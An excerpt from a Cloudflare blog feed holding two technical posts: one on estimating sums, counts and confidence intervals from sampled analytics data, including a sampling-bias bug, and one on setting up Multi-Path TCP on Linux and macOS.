$$\widehat{V}(\widehat{T}) = \sum_{i=1}^n{x_i^2 \frac{1 - \pi_i}{\pi_i^2}} = \sum_{i=1}^n{x_i^2 w_i (w_i-1)}.$$

For COUNT we use the same estimator, but plug in $x_i = 1$. This gives us:

$$\begin{align}
\widehat{C} &amp;= \sum_{i=1}^n{\frac{1}{\pi_i}} = \sum_{i=1}^n{w_i},\\
\widehat{V}(\widehat{C}) &amp;= \sum_{i=1}^n{\frac{1 - \pi_i}{\pi_i^2}} = \sum_{i=1}^n{w_i (w_i-1)}.
\end{align}$$

For AVG we would use

$$\begin{align}
\widehat{\mu} &amp;= \frac{\widehat{T}}{N},\\
\widehat{V}(\widehat{\mu}) &amp;= \frac{\widehat{V}(\widehat{T})}{N^2},
\end{align}$$

if we could, but the original population size $N$ is not known: it is not stored anywhere, and it is not even possible to store it because of custom filtering at query time. Plugging in $\widehat{C}$ instead of $N$ only partially works: it gives a valid estimator for the mean itself, but not for its variance, so the constructed confidence intervals are unusable.
<p></p>
In all cases, the corresponding pair of estimates is used as the $\mu$ and $\sigma^2$ of the normal distribution (because of the <a href="https://en.wikipedia.org/wiki/Central_limit_theorem">central limit theorem</a>), and then the bounds for the confidence interval (of confidence level $\alpha$) are:

$$\Big( \mu - \Phi^{-1}\big(\frac{1 + \alpha}{2}\big) \cdot \sigma, \quad \mu + \Phi^{-1}\big(\frac{1 + \alpha}{2}\big) \cdot \sigma\Big).$$<p>We do not know $N$, but there is a workaround: simultaneous confidence intervals. Construct confidence intervals for SUM and COUNT independently, and then combine them into a confidence interval for AVG. This is known as the <a href="https://www.sciencedirect.com/topics/mathematics/bonferroni-method"><u>Bonferroni method</u></a>. It requires generating wider intervals for SUM and COUNT, each at half the combined error probability (97.5% confidence each for a 95% result). Here is a simplified visual representation; the actual estimator also has to take into account the possibility of the orange area going below zero.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/69Vvi2CHSW8Gew0TWHSndj/1489cfe1ff57df4e7e1ca3c31a8444a5/BLOG-2486_5.png" />
          </figure><p>In SQL, the estimators and confidence intervals look like this:</p>
            <pre><code>WITH sum(x * _sample_interval)                              AS t,
     sum(x * x * _sample_interval * (_sample_interval - 1)) AS vt,
     sum(_sample_interval)                                  AS c,
     sum(_sample_interval * (_sample_interval - 1))         AS vc,
     -- ClickHouse does not expose the erf⁻¹ function, so we precompute some magic numbers,
     -- (only for 95% confidence, will be different otherwise):
     --   1.959963984540054 = Φ⁻¹((1+0.950)/2) = √2 * erf⁻¹(0.950)
     --   2.241402727604945 = Φ⁻¹((1+0.975)/2) = √2 * erf⁻¹(0.975)
     1.959963984540054 * sqrt(vt) AS err950_t,
     1.959963984540054 * sqrt(vc) AS err950_c,
     2.241402727604945 * sqrt(vt) AS err975_t,
     2.241402727604945 * sqrt(vc) AS err975_c
SELECT t - err950_t AS lo_total,
       t            AS est_total,
       t + err950_t AS hi_total,
       c - err950_c AS lo_count,
       c            AS est_count,
       c + err950_c AS hi_count,
       (t - err975_t) / (c + err975_c) AS lo_average,
       t / c                           AS est_average,
       (t + err975_t) / (c - err975_c) AS hi_average
FROM ...</code></pre>
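<p>The same estimators can be sanity-checked in a few lines of Python mirroring the SQL above (a sketch; the helper name is ours, and <code>statistics.NormalDist</code> supplies the Φ⁻¹ that ClickHouse lacks):</p>

```python
from statistics import NormalDist

def ht_confidence(samples, level=0.95):
    """Horvitz-Thompson estimates and confidence intervals for SUM and
    COUNT under Poisson sampling. `samples` is a list of
    (value, sample_interval) pairs, the sample interval being the weight
    w_i = 1/pi_i stored with each event."""
    z = NormalDist().inv_cdf((1 + level) / 2)  # 1.959963984... for 0.95
    t = sum(x * w for x, w in samples)                 # SUM estimate
    vt = sum(x * x * w * (w - 1) for x, w in samples)  # its variance
    c = sum(w for _, w in samples)                     # COUNT estimate
    vc = sum(w * (w - 1) for _, w in samples)          # its variance
    return {
        "sum": (t - z * vt**0.5, t, t + z * vt**0.5),
        "count": (c - z * vc**0.5, c, c + z * vc**0.5),
    }

# Sanity check: with sample interval 1 (no sampling at all) the
# variances vanish and the intervals collapse to the exact values.
exact = ht_confidence([(5, 1), (7, 1)])
assert exact["sum"] == (12, 12, 12)
assert exact["count"] == (2, 2, 2)
```
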
            <p>Construct a confidence interval for each timeslot on the timeseries, and you get a confidence band, clearly showing the accuracy of the analytics. The figure below shows an example of such a band in shading around the line.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4JEnnC6P4BhM8qB8J5yKqt/3635835967085f9b24f64a5731457ddc/BLOG-2486_6.png" />
          </figure>
    <div>
      <h3>Sampling is easy to screw up</h3>
      <a href="#sampling-is-easy-to-screw-up">
        
      </a>
    </div>
    <p>We started using confidence bands on our internal dashboards, and after a while noticed something scary: a systematic error! For one particular website the "total bytes served" estimate was higher than the true control value obtained from rollups, and the confidence bands were way off. See the figure below, where the true value (blue line) is outside the yellow confidence band at all times.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/CHCyKyXqPMj8DnMpBUf3N/772fb61f02b79c59417f66d9dc0b5d19/BLOG-2486_7.png" />
          </figure><p>We checked the stored data for corruption, it was fine. We checked the math in the queries, it was fine. It was only after reading through the source code for all of the systems responsible for sampling that we found a candidate for the root cause.</p><p>We used simple random sampling everywhere, basically "tossing a coin" for each event, but in Logreceiver sampling was done differently. Instead of sampling <i>randomly</i> it would perform <i>systematic sampling</i> by picking events at equal intervals starting from the first one in the batch.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4xUwjxdylG5ARlFlDtv1OC/76db68677b7ae072b0a065f59d82c6f2/BLOG-2486_8.png" />
          </figure><p>Why would that be a problem?</p>There are two reasons. The first is that we can no longer claim $\pi_{ij} = \pi_i \pi_j$, so the simplified variance estimator stops working and confidence intervals cannot be trusted. But even worse, the estimator for the total becomes biased. To understand why exactly, we wrote a short repro code in Python:
<br /><p></p>
            <pre><code>import itertools

def take_every(src, period):
    for i, x in enumerate(src):
        if i % period == 0:
            yield x

pattern = [10, 1, 1, 1, 1, 1]
sample_interval = 10 # bad if it has common factors with len(pattern)
true_mean = sum(pattern) / len(pattern)

orig = itertools.cycle(pattern)
sample_size = 10000
sample = itertools.islice(take_every(orig, sample_interval), sample_size)

sample_mean = sum(sample) / sample_size

print(f"{true_mean=} {sample_mean=}")</code></pre>
            <p>After playing with different values for <code><b>pattern</b></code> and <code><b>sample_interval</b></code> in the code above, we realized where the bias was coming from.</p><p>Imagine a person opening a huge generated HTML page with many small/cached resources, such as icons. The first response will be big, immediately followed by a burst of small responses. If the website is not visited that much, responses will tend to end up all together at the start of a batch in Logfwdr. Logreceiver does not cut batches, only concatenates them. The first response remains first, so it always gets picked and skews the estimate up.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2WZUzqCwr2A6WgX1T5UE8z/7a2e08b611fb64e64a61e3d5c792fe23/BLOG-2486_9.png" />
          </figure><p>We checked the hypothesis against the raw unsampled data that we happened to have because that particular website was also using one of the <a href="https://developers.cloudflare.com/logs/"><u>Logs</u></a> products. We took all events in a given time range, and grouped them by cutting at gaps of at least one minute. In each group, we ranked all events by time and looked at the variable of interest (response size in bytes), and put it on a scatter plot against the rank inside the group.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2IXtqGkRjV0xs3wvwx609A/81e67736cacbccdd839c2177769ee4fe/BLOG-2486_10.png" />
          </figure><p>A clear pattern! The first response is much more likely to be larger than average.</p><p>We fixed the issue by making Logreceiver shuffle the data before sampling. As we rolled out the fix, the estimation and the true value converged.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4TL1pKDLw7MA6yGMSCahJN/227cb22054e0e8fe65c7766aa6e4b541/BLOG-2486_11.png" />
          </figure><p>Now, after battle testing it for a while, we are confident the HT estimator is implemented properly and we are using the correct sampling process.</p>
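<p>The effect of the fix is easy to reproduce with the same kind of toy data as the earlier Python repro (a sketch with made-up numbers): shuffling before systematic sampling breaks the alignment between the periodic pattern and the sampling stride.</p>

```python
import random

pattern = [10, 1, 1, 1, 1, 1]            # one big response, then small ones
sample_interval = 10
true_mean = sum(pattern) / len(pattern)  # 2.5

batch = pattern * 10_000                 # 60,000 events in arrival order
random.Random(42).shuffle(batch)         # the fix: shuffle before sampling
sample = batch[::sample_interval]        # systematic 1-in-10 sample

sample_mean = sum(sample) / len(sample)
assert abs(sample_mean - true_mean) < 0.2  # now an unbiased estimate
```

<p>Without the <code>shuffle</code> call, the stride would keep landing on the same positions of the pattern and the estimate would be systematically off, exactly as in the repro above.</p>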
    <div>
      <h3>Using Cloudflare's analytics APIs to query sampled data</h3>
      <a href="#using-cloudflares-analytics-apis-to-query-sampled-data">
        
      </a>
    </div>
    <p>We already power most of our analytics datasets with sampled data. For example, the <a href="https://developers.cloudflare.com/analytics/analytics-engine/"><u>Workers Analytics Engine</u></a> exposes the <a href="https://developers.cloudflare.com/analytics/analytics-engine/sql-api/#sampling"><u>sample interval</u></a> in SQL, allowing our customers to build their own dashboards with confidence bands. In the GraphQL API, all of the data nodes that have "<a href="https://developers.cloudflare.com/analytics/graphql-api/sampling/#adaptive-sampling"><u>Adaptive</u></a>" in their name are based on sampled data, and the sample interval is exposed as a field there as well, though it is not possible to build confidence intervals from that alone. We are working on exposing confidence intervals in the GraphQL API, and as an experiment have added them to the count and edgeResponseBytes (sum) fields on the httpRequestsAdaptiveGroups nodes. This is available under <code><b>confidence(level: X)</b></code>.</p><p>Here is a sample GraphQL query:</p>
            <pre><code>query HTTPRequestsWithConfidence(
  $accountTag: string
  $zoneTag: string
  $datetimeStart: string
  $datetimeEnd: string
) {
  viewer {
    zones(filter: { zoneTag: $zoneTag }) {
      httpRequestsAdaptiveGroups(
        filter: {
          datetime_geq: $datetimeStart
          datetime_leq: $datetimeEnd
      }
      limit: 100
    ) {
      confidence(level: 0.95) {
        level
        count {
          estimate
          lower
          upper
          sampleSize
        }
        sum {
          edgeResponseBytes {
            estimate
            lower
            upper
            sampleSize
          }
        }
      }
    }
  }
}
</code></pre>
            <p>The query above asks for the estimates and the 95% confidence intervals for <code><b>SUM(edgeResponseBytes)</b></code> and <code><b>COUNT</b></code>. The results will also show the sample size, which is good to know, as we rely on the <a href="https://en.wikipedia.org/wiki/Central_limit_theorem"><u>central limit theorem</u></a> to build the confidence intervals, thus small samples don't work very well.</p><p>Here is the response from this query:</p>
            <pre><code>{
  "data": {
    "viewer": {
      "zones": [
        {
          "httpRequestsAdaptiveGroups": [
            {
              "confidence": {
                "level": 0.95,
                "count": {
                  "estimate": 96947,
                  "lower": "96874.24",
                  "upper": "97019.76",
                  "sampleSize": 96294
                },
                "sum": {
                  "edgeResponseBytes": {
                    "estimate": 495797559,
                    "lower": "495262898.54",
                    "upper": "496332219.46",
                    "sampleSize": 96294
                  }
                }
              }
            }
          ]
        }
      ]
    }
  },
  "errors": null
}
</code></pre>
            <p>The response shows the estimated count is 96947, and we are 95% confident that the true count lies in the range 96874.24 to 97019.76. Similarly, the estimate and range for the sum of response bytes are provided.</p><p>The estimates are based on a sample size of 96294 rows, which is plenty of samples to calculate good confidence intervals.</p>
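<p>As a quick back-of-the-envelope check on the numbers in the response above, the half-width of the count interval relative to the estimate shows how tight it is:</p>

```python
# Numbers taken from the GraphQL response above.
est, lo, hi = 96947, 96874.24, 97019.76
rel_err = (hi - lo) / 2 / est  # half-width relative to the estimate
assert rel_err < 0.001         # well under 0.1% at this sample size
```
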
    <div>
      <h3>Conclusion</h3>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>We have discussed what kept our data pipeline scalable and resilient despite doubling in size every 1.5 years, how the math works, and how it is easy to mess up. We are constantly working on better ways to keep the data pipeline, and the products based on it, useful to our customers. If you are interested in doing things like that and want to help us build a better Internet, check out our <a href="http://www.cloudflare.com/careers"><u>careers page</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[Analytics]]></category>
            <category><![CDATA[Data]]></category>
            <category><![CDATA[GraphQL]]></category>
            <category><![CDATA[SQL]]></category>
            <category><![CDATA[Go]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Sampling]]></category>
            <guid isPermaLink="false">64DSvKdN853gq5Bx3Cyfij</guid>
            <dc:creator>Constantin Pan</dc:creator>
            <dc:creator>Jim Hawkridge</dc:creator>
        </item>
        <item>
            <title><![CDATA[Multi-Path TCP: revolutionizing connectivity, one path at a time]]></title>
            <link>https://blog.cloudflare.com/multi-path-tcp-revolutionizing-connectivity-one-path-at-a-time/</link>
            <pubDate>Fri, 03 Jan 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Multi-Path TCP (MPTCP) leverages multiple network interfaces, like Wi-Fi and cellular, to provide seamless mobility for more reliable connectivity. While promising, MPTCP is still in its early stages, ]]></description>
            <content:encoded><![CDATA[ <p>The Internet is designed to provide multiple paths between two endpoints. Attempts to exploit multi-path opportunities are almost as old as the Internet, culminating in <a href="https://datatracker.ietf.org/doc/html/rfc2991"><u>RFCs</u></a> documenting some of the challenges. Still, today, virtually all end-to-end communication uses only one available path at a time. Why? It turns out that in multi-path setups, even the smallest differences between paths can harm the connection quality due to <a href="https://en.wikipedia.org/wiki/Equal-cost_multi-path_routing#History"><u>packet reordering</u></a> and other issues. As a result, Internet devices usually use a single path and let the routers handle the path selection.</p><p>There is another way. Enter Multi-Path TCP (MPTCP), which exploits the presence of multiple interfaces on a device, such as a mobile phone that has both Wi-Fi and cellular antennas, to achieve multi-path connectivity.</p><p>MPTCP has had a long history: see the <a href="https://en.wikipedia.org/wiki/Multipath_TCP"><u>Wikipedia article</u></a> and the <a href="https://datatracker.ietf.org/doc/html/rfc8684"><u>spec (RFC 8684)</u></a> for details. It's a major extension to the TCP protocol, and historically most TCP extensions have failed to gain traction. However, MPTCP is supposed to be mostly an operating system feature, making it easy to enable. Applications should only need minor code changes to support it.</p><p>There is a caveat, however: MPTCP is still fairly immature, and while it can use multiple paths, giving it superpowers over regular TCP, it's not always strictly better. Whether MPTCP should be used instead of TCP is really a case-by-case decision.</p><p>In this blog post we show how to set up MPTCP to find out.</p> ]]></content:encoded>
    <div>
      <h2>Subflows</h2>
      <a href="#subflows">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3r8AP5BHbvtYEtXmYSXFwO/36e95cbac93cdecf2f5ee65945abf0b3/Screenshot_2024-12-23_at_3.07.37_PM.png" />
          </figure><p>Internally, MPTCP extends TCP by introducing "subflows". When everything is working, a single TCP connection can be backed by multiple MPTCP subflows, each using a different path. This is a big deal: a single TCP byte stream is no longer identified by a single 5-tuple. On Linux you can see the subflows with <code>ss -M</code>, like:</p>
            <pre><code>marek$ ss -tMn dport = :443 | cat
tcp   ESTAB 0  	0 192.168.2.143%enx2800af081bee:57756 104.28.152.1:443
tcp   ESTAB 0  	0       192.168.1.149%wlp0s20f3:44719 104.28.152.1:443
mptcp ESTAB 0  	0                 192.168.2.143:57756 104.28.152.1:443</code></pre>
            <p>Here you can see a single MPTCP connection, composed of two underlying TCP flows.</p>
    <div>
      <h2>MPTCP aspirations</h2>
      <a href="#mptcp-aspirations">
        
      </a>
    </div>
    <p>Being able to separate the lifetime of a connection from the lifetime of a flow allows MPTCP to address two problems present in classical TCP: aggregation and mobility.</p><ul><li><p><b>Aggregation</b>: MPTCP can aggregate the bandwidth of many network interfaces. For example, in a data center scenario, it's common to use interface bonding. A single flow can make use of just one physical interface. MPTCP, by being able to launch many subflows, can expose greater overall bandwidth. I'm personally not convinced this is a real problem. As we'll learn below, modern Linux has a <a href="https://dl.ifip.org/db/conf/networking/networking2016/1570234725.pdf"><u>BLESS-like MPTCP scheduler</u></a> and the macOS stack has an "aggregation" mode, so aggregation should work, but I'm not sure how practical it is. However, there are <a href="https://www.openmptcprouter.com/"><u>certainly projects that are trying to do link aggregation</u></a> using MPTCP.</p></li><li><p><b>Mobility</b>: On a customer device, a TCP stream is typically broken if the underlying network interface goes away. This is not an uncommon occurrence: consider a smartphone dropping from Wi-Fi to cellular. MPTCP can fix this: it can create and destroy many subflows over the lifetime of a single connection and survive multiple network changes.</p></li></ul><p>Improving reliability for mobile clients is a big deal. While some software can use QUIC, for which <a href="https://www.ietf.org/archive/id/draft-ietf-quic-multipath-11.html"><u>Multipath Extensions</u></a> are also being developed, a large number of classical services still use TCP. A great example is SSH: it would be very nice if you could walk around with a laptop, keep an SSH session open, and switch Wi-Fi networks seamlessly, without breaking the connection.</p><p>MPTCP work was initially driven by <a href="https://uclouvain.be/fr/index.html"><u>UCLouvain in Belgium</u></a>. The first serious adoption was on the iPhone: apparently, users tend to start using Siri while walking out of their homes, and it's very common to lose Wi-Fi connectivity while doing so. (<a href="https://youtu.be/BucQ1lfbtd4?t=533"><u>source</u></a>) </p>
    <div>
      <h2>Implementations</h2>
      <a href="#implementations">
        
      </a>
    </div>
    <p>Currently, there are only two major MPTCP implementations: the Linux kernel since v5.6 (though realistically you need at least kernel v6.1; <a href="https://oracle.github.io/kconfigs/?config=UTS_RELEASE&amp;config=MPTCP"><u>MPTCP is not supported on Android</u></a> yet), and iOS since version 7 / Mac OS X since 10.10.</p><p>Typically, Linux is used on the server side, and iOS/macOS as the client. It's possible to get Linux to work as a client, but it's not straightforward, as we'll learn soon. Beware: there is plenty of outdated Linux MPTCP documentation, as the code has had a bumpy history and at least two different APIs were proposed. See the Linux kernel documentation for <a href="https://docs.kernel.org/networking/mptcp.html"><u>the mainline API</u></a> and the <a href="https://www.mptcp.dev/"><u>mptcp.dev</u></a> website.</p>
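<p>On Linux, the "minor code change" an application needs is to pass <code>IPPROTO_MPTCP</code> when creating the socket. Here is a minimal Python sketch (the numeric fallback is for Python versions that don't export the constant; whether the call succeeds depends on the running kernel, so the code falls back to plain TCP):</p>

```python
import socket

# IPPROTO_MPTCP is 262 on Linux; socket.IPPROTO_MPTCP exists only in
# newer Python versions, so fall back to the raw number.
IPPROTO_MPTCP = getattr(socket, "IPPROTO_MPTCP", 262)

def mptcp_socket():
    """Return an MPTCP socket, or None if the kernel doesn't support it
    (older kernel, non-Linux OS, or net.mptcp.enabled=0)."""
    try:
        return socket.socket(socket.AF_INET, socket.SOCK_STREAM, IPPROTO_MPTCP)
    except OSError:
        return None

sock = mptcp_socket()
if sock is None:
    print("MPTCP unavailable, falling back to plain TCP")
else:
    print("MPTCP socket created")
    sock.close()
```

<p>If the MPTCP handshake with the remote peer fails, the kernel transparently falls back to regular TCP on the same socket, so opting in is low-risk for the application.</p>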
    <div>
      <h2>Linux as a server</h2>
      <a href="#linux-as-a-server">
        
      </a>
    </div>
    <p>Conceptually, the MPTCP design is pretty sensible. After the initial TCP handshake, each peer may announce additional addresses (and ports) on which it can be reached. There are two ways of doing this. First, in the handshake TCP packet each peer specifies the "<i>Do not attempt to establish new subflows to this address and port</i>" bit, also known as bit [C], in the MPTCP TCP extensions header.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/bT8oz3wxpw7alftvdYg5n/b7614a4d10b6c81e18027f6785391ede/BLOG-2637_3.png" />
          </figure><p><sup><i>Wireshark dissecting MPTCP flags from a SYN packet. </i></sup><a href="https://github.com/multipath-tcp/mptcp_net-next/issues/535"><sup><i><u>Tcpdump does not report</u></i></sup></a><sup><i> this flag yet.</i></sup></p><p>With this bit cleared, the other peer is free to assume the two-tuple is fine to be reconnected to. Typically, the <b>server allows</b> the client to reuse the server IP/port address. Usually, the <b>client is not listening</b> and disallows the server to connect back to it. There are caveats though. For example, in the context of Cloudflare, where our servers are using Anycast addressing, reconnecting to the server IP/port won't work. Going twice to the IP/port pair is unlikely to reach the same server. For us it makes sense to set this flag, disallowing clients from reconnecting to our server addresses. This can be done on Linux with:</p>
            <pre><code># Linux server sysctl - useful for ECMP or Anycast servers
$ sysctl -w net.mptcp.allow_join_initial_addr_port=0
</code></pre>
            <p>There is also a second way to advertise a listening IP/port. During the lifetime of a connection, a peer can send an ADD-ADDR MPTCP signal which advertises a listening IP/port. This can be managed on Linux by <code>ip mptcp endpoint ... signal</code>, like:</p>
            <pre><code># Linux server - extra listening address
$ ip mptcp endpoint add 192.51.100.1 dev eth0 port 4321 signal
</code></pre>
            <p>With such a config, a Linux peer (typically the server) will advertise the additional IP/port with an ADD-ADDR MPTCP signal in an ACK packet, like this:</p>
            <pre><code>host &gt; host: Flags [.], ack 1, win 8, options [mptcp 30 add-addr v1 id 1 192.51.100.1:4321 hmac 0x...,nop,nop], length 0
</code></pre>
            <p>It's important to realize that either peer can send ADD-ADDR messages. Unusual as it might sound, it's totally fine for the client to advertise extra listening addresses. The most common scenario, though, is that either nobody, or just the server, sends ADD-ADDR.</p><p>Technically, to launch an MPTCP socket on Linux, you just need to replace IPPROTO_TCP with IPPROTO_MPTCP in the application code:</p>
            <pre><code>IPPROTO_MPTCP = 262
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_MPTCP)
</code></pre>
            <p>In practice, though, this introduces some changes to the sockets API. Not all <code>setsockopt</code> options work yet — <code>TCP_USER_TIMEOUT</code>, for example. Additionally, at this stage, MPTCP is incompatible with kTLS.</p>
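<p>To make this concrete, here is a minimal Python sketch of the same call with a fallback path: try an MPTCP socket first, and drop back to plain TCP when the kernel or OS has no MPTCP support. The fall-back-on-<code>OSError</code> behaviour and the hard-coded 262 (for Pythons that don't export <code>socket.IPPROTO_MPTCP</code>) are my assumptions, not part of the snippet above:</p>

```python
import socket

# IPPROTO_MPTCP is 262 on Linux; older Python versions don't export it.
IPPROTO_MPTCP = getattr(socket, "IPPROTO_MPTCP", 262)

def stream_socket():
    """Return an MPTCP stream socket when possible, else plain TCP."""
    try:
        return socket.socket(socket.AF_INET, socket.SOCK_STREAM, IPPROTO_MPTCP)
    except OSError:
        # Typically EINVAL / ENOPROTOOPT / EPROTONOSUPPORT: the kernel was
        # built without CONFIG_MPTCP, net.mptcp.enabled=0, or it's not Linux.
        return socket.socket(socket.AF_INET, socket.SOCK_STREAM)

sock = stream_socket()
# sock.proto is IPPROTO_MPTCP when MPTCP was available, 0 after the fallback
sock.close()
```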
    <div>
      <h2>Path manager / scheduler</h2>
      <a href="#path-manager-scheduler">
        
      </a>
    </div>
    <p>Once the peers have exchanged the address information, MPTCP is ready to kick in and perform the magic. There are two independent pieces of logic that MPTCP handles. First, given the address information, MPTCP must figure out if it should establish additional subflows. The component that decides on this is called "Path Manager". Then, another component called "scheduler" is responsible for choosing a specific subflow to transmit the data over.</p><p>Both peers have a path manager, but typically only the client uses it. A path manager has a hard task to launch enough subflows to get the benefits, but not too many subflows which could waste resources. This is where the MPTCP stacks get complicated. </p>
    <div>
      <h2>Linux as client</h2>
      <a href="#linux-as-client">
        
      </a>
    </div>
    <p>On Linux, the path manager is an operating system feature, not an application feature. The in-kernel path manager requires some configuration — it must know which IP addresses and interfaces may be used to start new subflows. This is configured with <code>ip mptcp endpoint ... subflow</code>, like:</p>
            <pre><code>$ ip mptcp endpoint add dev wlp1s0 192.0.2.3 subflow  # Linux client
</code></pre>
            <p>This informs the path manager that we (typically a client) own a 192.0.2.3 IP address on interface wlp1s0, and that it's fine to use it as source of a new subflow. There are two additional flags that can be passed here: "backup" and "fullmesh". Maintaining these <code>ip mptcp endpoints</code> on a client is annoying. They need to be added and removed every time networks change. Fortunately, <a href="https://ubuntu.com/core/docs/networkmanager"><u>NetworkManager</u></a> from 1.40 supports managing these by default. If you want to customize the "backup" or "fullmesh" flags, you can do this here (see <a href="https://networkmanager.dev/docs/api/1.44.4/settings-connection.html#:~:text=mptcp-flags"><u>the documentation</u></a>):</p>
            <pre><code>ubuntu$ cat /etc/NetworkManager/conf.d/95-mptcp.conf
# set "subflow" on all managed "ip mptcp endpoints". 0x22 is the default.
[connection]
connection.mptcp-flags=0x22
</code></pre>
            <p>Path manager also takes a "limit" setting, to set a cap of additional subflows per MPTCP connection, and limit the received ADD-ADDR messages, like: </p>
            <pre><code>$ ip mptcp limits set subflow 4 add_addr_accepted 2  # Linux client
</code></pre>
            <p>I experimented with the "mobility" use case on my Ubuntu 22 Linux laptop. I repeatedly enabled and disabled Wi-Fi and Ethernet. On new kernels (v6.12), it works, and I was able to hold a reliable MPTCP connection over many interface changes. I was <a href="https://github.com/multipath-tcp/mptcp_net-next/issues/534"><u>less lucky with the Ubuntu v6.8</u></a> kernel. Unfortunately, the <a href="https://github.com/multipath-tcp/mptcp_net-next/issues/536"><u>default path manager on a Linux client</u></a> only works when the flag "<i>Do not attempt to establish new subflows to this address and port</i>" is cleared on the server. Server-announced ADD-ADDR messages don't result in new subflows being created unless the <code>ip mptcp endpoint</code> has a <code>fullmesh</code> flag.</p><p>It feels like the underlying MPTCP transport code works, but the path manager requires a bit more intelligence. With a new kernel, it's possible to get the "interactive" case working out of the box, but not the ADD-ADDR case. </p>
    <div>
      <h2>Custom path manager</h2>
      <a href="#custom-path-manager">
        
      </a>
    </div>
    <p>Linux allows for two implementations of the path manager component. It can use either the built-in kernel implementation (the default) or a userspace netlink daemon.</p>
            <pre><code>$ sysctl -w net.mptcp.pm_type=1 # use userspace path manager
</code></pre>
            <p>However, from what I found, there is no serious implementation of a configurable userspace path manager. The existing <a href="https://github.com/multipath-tcp/mptcpd/blob/main/plugins/path_managers/sspi.c"><u>implementations don't do much</u></a>, and the API <a href="https://github.com/multipath-tcp/mptcp_net-next/issues/533"><u>seems</u></a> <a href="https://github.com/multipath-tcp/mptcp_net-next/issues/532"><u>immature</u></a> so far.</p>
    <div>
      <h2>Scheduler and BPF extensions</h2>
      <a href="#scheduler-and-bpf-extensions">
        
      </a>
    </div>
    <p>Thus far we've covered the path manager, but what about the scheduler that chooses which link to actually use? It seems that on Linux there is only one built-in "default" scheduler, and it can do basic failover on packet loss. The developers want to write <a href="https://github.com/multipath-tcp/mptcp_net-next/issues/75"><u>MPTCP schedulers in BPF</u></a>, and this work is in progress.</p>
    <div>
      <h2>macOS</h2>
      <a href="#macos">
        
      </a>
    </div>
    <p>As opposed to Linux, macOS and iOS expose a raw MPTCP API. On those operating systems, path manager is not handled by the kernel, but instead can be an application responsibility. The exposed low-level API is based on <code>connectx()</code>. For example, <a href="https://github.com/apple-oss-distributions/network_cmds/blob/97bfa5b71464f1286b51104ba3e60db78cd832c9/mptcp_client/mptcp_client.c#L461"><u>here's an example of obscure code</u></a> that establishes one connection with two subflows:</p>
            <pre><code>int sock = socket(AF_MULTIPATH, SOCK_STREAM, 0);
connectx(sock, ..., &amp;cid1);
connectx(sock, ..., &amp;cid2);
</code></pre>
            <p>This powerful API is hard to use though, as it would require every application to listen for network changes. Fortunately, macOS and iOS also expose higher-level APIs. One <a href="https://github.com/mptcp-apps/mptcp-hello/blob/main/c/macOS/main.c"><u>example is nw_connection</u></a> in C, which uses nw_parameters_set_multipath_service.</p><p>Another, more common example is using <code>Network.framework</code>, and would <a href="https://gist.github.com/majek/cb54b537c74506164d2a7fa2d6601491"><u>look like this</u></a>:</p>
            <pre><code>let parameters = NWParameters.tcp
parameters.multipathServiceType = .interactive
let connection = NWConnection(host: host, port: port, using: parameters) 
</code></pre>
            <p>The API supports three MPTCP service type modes:</p><ul><li><p><i>Handover Mode</i>: Tries to minimize cellular. Uses only Wi-Fi. Uses cellular only when <a href="https://support.apple.com/en-us/102228"><u>Wi-Fi Assist</u></a> is enabled and makes such a decision.</p></li><li><p><i>Interactive Mode</i>: Used for Siri. Reduces latency. Only for low-bandwidth flows.</p></li><li><p><i>Aggregation Mode</i>: Enables resource pooling but it's only available for developer accounts and not deployable.</p></li></ul>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/47MukOs6bhCMOkO1JL15sP/7dd75417b855b681bde504122d5af01e/Screenshot_2024-12-23_at_2.59.51_PM.png" />
          </figure><p>The MPTCP API is nicely integrated with the <a href="https://support.apple.com/en-us/102228"><u>iPhone "Wi-Fi Assist" feature</u></a>. While the official documentation is lacking, it's possible to find <a href="https://youtu.be/BucQ1lfbtd4?t=533"><u>sources explaining</u></a> how it actually works. I was able to successfully test both the cleared "<i>Do not attempt to establish new subflows"</i> bit and ADD-ADDR scenarios. Hurray!</p>
    <div>
      <h2>IPv6 caveat</h2>
      <a href="#ipv6-caveat">
        
      </a>
    </div>
    <p>Sadly, MPTCP IPv6 has a caveat. Since IPv6 addresses are long, and MPTCP uses the space-constrained TCP Extensions field, there is <a href="https://github.com/multipath-tcp/mptcp_net-next/issues/448"><u>not enough room for ADD-ADDR messages</u></a> if TCP timestamps are enabled. If you want to use MPTCP and IPv6, it's something to consider.</p>
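<p>To put rough numbers on that squeeze (option sizes per RFC 8684; the arithmetic below is my own illustration, not taken from the linked issue):</p>

```python
# TCP headers allow at most 40 bytes of options. The timestamp option takes
# 10 bytes and is conventionally padded with 2 NOPs, leaving 28 bytes free.
TCP_OPTION_SPACE = 40
TIMESTAMPS_WITH_PADDING = 10 + 2

def add_addr_len(ipv6=False, port=False):
    """ADD_ADDR option size: kind + length + subtype/ipver + address ID
    + address + truncated HMAC, plus an optional 2-byte port."""
    return 1 + 1 + 1 + 1 + (16 if ipv6 else 4) + 8 + (2 if port else 0)

remaining = TCP_OPTION_SPACE - TIMESTAMPS_WITH_PADDING  # 28 bytes left
assert add_addr_len(ipv6=True) == 28                    # barely fits...
assert add_addr_len(ipv6=True, port=True) > remaining   # ...with a port it can't
```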
    <div>
      <h2>Summary</h2>
      <a href="#summary">
        
      </a>
    </div>
